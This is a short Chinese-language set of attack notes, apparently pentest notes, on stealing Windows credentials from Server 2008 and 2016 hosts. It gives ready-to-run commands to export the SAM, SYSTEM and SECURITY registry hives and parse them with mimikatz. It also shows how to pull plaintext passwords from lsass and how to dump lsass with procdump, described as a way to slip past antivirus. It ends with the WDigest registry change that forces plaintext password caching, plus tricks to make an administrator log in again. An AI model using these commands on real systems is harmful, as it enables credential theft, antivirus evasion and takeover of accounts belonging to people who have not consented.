Windows server 2008:
【1】当sam文件被占用时,利用reg(注册表)导出文件三个文件(需要administrator权限)
reg save HKLM\sam C:\sam.hive
reg save HKLM\system C:\system.hive
reg save HKLM\security C:\security.hive
再把三个文件放到mimikatz同目录下执行命令,在当前目录下会生成一个log.txt
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" "exit" > log.txt
【2】从lsass进程中,读取明文密码(需要administrator权限)
先将mimikatz.exe、mimikatz.dll、sysdig.dll 上传至目标系统,然后目录下执行如下命令
开cmd敲命令:mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" >hash.txt
【3】如果存在杀软,则利用Procdump工具把进程对应的内存空间中的数据,转存为文件
因为Procdump工具是微软开发的工具所以一般不会杀掉,有32和64位的!
把工具上传至目标系统然后执行命令procdump64.exe -accepteula -ma lsass.exe lsass
把lsass.dmp文件下载到自己的攻击机上使用mimikatz进行抓取Hash
WindowsServer2016
在win2008以上中lsass.exe已经不在存在明文密码了,没有修改注册表只能抓到Hash
所以我们这里利用修改注册表读取明文密码,改了不能直接抓还得需要用户重新输入密码登录
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
使用一些其他的手段,使管理员重新输入密码登录,锁屏、重启......登录后就可以抓到明文
未完!
